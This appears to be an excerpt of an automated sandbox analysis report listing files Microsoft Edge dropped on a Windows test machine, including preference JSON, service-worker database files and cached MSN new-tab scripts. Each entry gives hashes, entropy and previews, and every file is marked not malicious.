                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF33a4b.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF36d61.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3cc1b.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.109781454570743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAkdpUsyByyaNP9ko9K8TbV+Fl3QAt7HPkiYJ:stAQUsyQtJbbGZQSK
                                                                                                                                                                                                                                                                                          MD5:03FA061F3B4BA77E1D61C9C52D66EE53
                                                                                                                                                                                                                                                                                          SHA1:4DB2AB5F7960C44D7313999400D7AAB84BD411D9
                                                                                                                                                                                                                                                                                          SHA-256:D021CA34E3106E9F7B3285D6C5A15480367967F277590649FC2B1FC7EB80F85C
                                                                                                                                                                                                                                                                                          SHA-512:C19B43383BA2FC229D941C6BD9116CA0D0BA1E380015F5F4087B5C58AE3A1993422958BC8B35BB6239A9BD1E6526333CE16E66D077A16D2652E0EB6B8C2DA8A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):25012
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567639435794489
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i6bUhjWPLLfXq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaLTPVrw7pOtuR:i6bUhjWPLLfXqu1jabvPeAtG
                                                                                                                                                                                                                                                                                          MD5:5DD00C3354A01EC760C751D472E5B7E8
                                                                                                                                                                                                                                                                                          SHA1:F8DA696FA400BAEAE0199280A3745FC064C5828C
                                                                                                                                                                                                                                                                                          SHA-256:8B7E9CC909178CC1AB72AD4C5CA8B72EB11081682750CC16CB76126BB0403D99
                                                                                                                                                                                                                                                                                          SHA-512:B027DA16B57278567DA8E0DE90BE0385803A2ACD0B0039DE7AA8A6FB325B9774FECF1AE6E39F8DC39B86DC625D8740397557DD1CB9D75E1F567BB6E9E90891B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379071552709354","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379071552709354","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF30c46.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):25012
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567639435794489
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i6bUhjWPLLfXq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaLTPVrw7pOtuR:i6bUhjWPLLfXqu1jabvPeAtG
                                                                                                                                                                                                                                                                                          MD5:5DD00C3354A01EC760C751D472E5B7E8
                                                                                                                                                                                                                                                                                          SHA1:F8DA696FA400BAEAE0199280A3745FC064C5828C
                                                                                                                                                                                                                                                                                          SHA-256:8B7E9CC909178CC1AB72AD4C5CA8B72EB11081682750CC16CB76126BB0403D99
                                                                                                                                                                                                                                                                                          SHA-512:B027DA16B57278567DA8E0DE90BE0385803A2ACD0B0039DE7AA8A6FB325B9774FECF1AE6E39F8DC39B86DC625D8740397557DD1CB9D75E1F567BB6E9E90891B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379071552709354","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379071552709354","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.81916591870255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:F2xc5NmHcncmoDCRORpllg2hETfRHUgldCRORpllg2hL0YNwFCRORpllg2hEWRHk:F2emoMrd6TfBzrd5RQrd6WB4rdABu
                                                                                                                                                                                                                                                                                          MD5:8682D06B616D2EBCD1B66DDB1E7D9729
                                                                                                                                                                                                                                                                                          SHA1:DD03E9970D5976FA63C4A770E5AF6DB56150991A
                                                                                                                                                                                                                                                                                          SHA-256:95FC8B0DA3E1654B7A9B98A976DE79DBBBFE524FEE6AFECA1DDA5AC5DC9F44EE
                                                                                                                                                                                                                                                                                          SHA-512:368A54F0FEDF60ECAB1CFB2DFD7D21D545EA531C9A4FD156DF5D3913E486D894EA8287D8BB194328B3C8F0FD487DC7698E3D4B0113176DDA994FE7FA4C13463A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.:H..................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):305
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.176589151372698
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R46ZR1cNwi23oH+TcwtE/a252KLlp8R44K+q2PcNwi23oH+TcwtE/a2ZIFUv:7eZ/ZYeb8xLTovLZYeb8J2FUv
                                                                                                                                                                                                                                                                                          MD5:E34291F4548000FDE0CAAF8662537E29
                                                                                                                                                                                                                                                                                          SHA1:669FED35D85049CC6797C19AB5FA8FC1B9FAE451
                                                                                                                                                                                                                                                                                          SHA-256:9DCE2A7A7D355BED6DC06F60F8B023980DAB378F1301AFFF8418905ABC2BE948
                                                                                                                                                                                                                                                                                          SHA-512:7A4AD549D2E982C036688226AED395899F9FAE5D6E7DA87A192A8D0D242959E7C5DCE90C5EC8FAC96E697F07764919CB3A18C4C4A2E16C0922FCB755762718A9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:46:10.815 19e8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/19-03:46:10.830 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):114579
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.57812137291716
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtGfki7QpRea+/:J9LyxPXfOxr1lMe1nL/5L/TXE6U7WK
                                                                                                                                                                                                                                                                                          MD5:B84EBE8170E5C9F36F27B55468E66503
                                                                                                                                                                                                                                                                                          SHA1:94D121272B13FF67BE7FC8113518303C70915931
                                                                                                                                                                                                                                                                                          SHA-256:7EF10054133F53A0A358EE0596CF0DFF9E6D6546657DAEA52CB9C3C602DE4AE4
                                                                                                                                                                                                                                                                                          SHA-512:0A64ED6CF95181F65600A3DD4A40DB62FEB99D3C58BCD0A24C6036EA9E922E5396D82D5E439D3D1F8D107BDAE806304BA2BBB72A9D99B61767C7C9011AF4372A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):189105
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.38662863899425
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:D0RygsG8AvWZwDPpIQz4o5L/h2TgKlvcWC0MHEGVb0QUDEL5:HjZwD6QNL/kElWgF5
                                                                                                                                                                                                                                                                                          MD5:5521F57EBEF8D7ADCD091770905123B0
                                                                                                                                                                                                                                                                                          SHA1:66FE42909697E7AC16164A1BCE4C04178ECF758F
                                                                                                                                                                                                                                                                                          SHA-256:C0F057CE82EADBFDB3BAB77254F61927C00B713B421AD7A452BC79557F91AE14
                                                                                                                                                                                                                                                                                          SHA-512:C8C480F72F3481EA180DCCA9732F83422B959D6468679B0D5771390EFEED0090DF68ABB3831639518BD94629A2DA3E7A0A2653D846F6A2CEF6D9240CF694D287
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0....z3.................;.....x.X........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc...s....module....RcR.K.....define....Rb&......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....R..{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:xiXl/lYV/lxEstllQUDUtKln:MYWs+UDU4l
                                                                                                                                                                                                                                                                                          MD5:B13AA883C2012823BD512FEA13A7BE23
                                                                                                                                                                                                                                                                                          SHA1:8EE3BA0F1CB4C060080119729AA2B4BA6CA2C13C
                                                                                                                                                                                                                                                                                          SHA-256:5E9DEB9F27ABCFE626B6054200D6ED1A8F41008D20D0E59D035ECBB0222C593E
                                                                                                                                                                                                                                                                                          SHA-512:34FBC5AC8BE03DD8CB38E4DF936A3ED0898962B9E0A1268D6853B9259FB94D1C4EDBDA5E1109D33BF72A5C050E4A03503661AB069D8C49ECC653ACFA69ACEAD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@...D..oy retne.........................X....,..................t.1./.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:xiXl/lYV/lxEstllQUDUtKln:MYWs+UDU4l
                                                                                                                                                                                                                                                                                          MD5:B13AA883C2012823BD512FEA13A7BE23
                                                                                                                                                                                                                                                                                          SHA1:8EE3BA0F1CB4C060080119729AA2B4BA6CA2C13C
                                                                                                                                                                                                                                                                                          SHA-256:5E9DEB9F27ABCFE626B6054200D6ED1A8F41008D20D0E59D035ECBB0222C593E
                                                                                                                                                                                                                                                                                          SHA-512:34FBC5AC8BE03DD8CB38E4DF936A3ED0898962B9E0A1268D6853B9259FB94D1C4EDBDA5E1109D33BF72A5C050E4A03503661AB069D8C49ECC653ACFA69ACEAD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@...D..oy retne.........................X....,..................t.1./.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF352d4.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:xiXl/lYV/lxEstllQUDUtKln:MYWs+UDU4l
                                                                                                                                                                                                                                                                                          MD5:B13AA883C2012823BD512FEA13A7BE23
                                                                                                                                                                                                                                                                                          SHA1:8EE3BA0F1CB4C060080119729AA2B4BA6CA2C13C
                                                                                                                                                                                                                                                                                          SHA-256:5E9DEB9F27ABCFE626B6054200D6ED1A8F41008D20D0E59D035ECBB0222C593E
                                                                                                                                                                                                                                                                                          SHA-512:34FBC5AC8BE03DD8CB38E4DF936A3ED0898962B9E0A1268D6853B9259FB94D1C4EDBDA5E1109D33BF72A5C050E4A03503661AB069D8C49ECC653ACFA69ACEAD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@...D..oy retne.........................X....,..................t.1./.

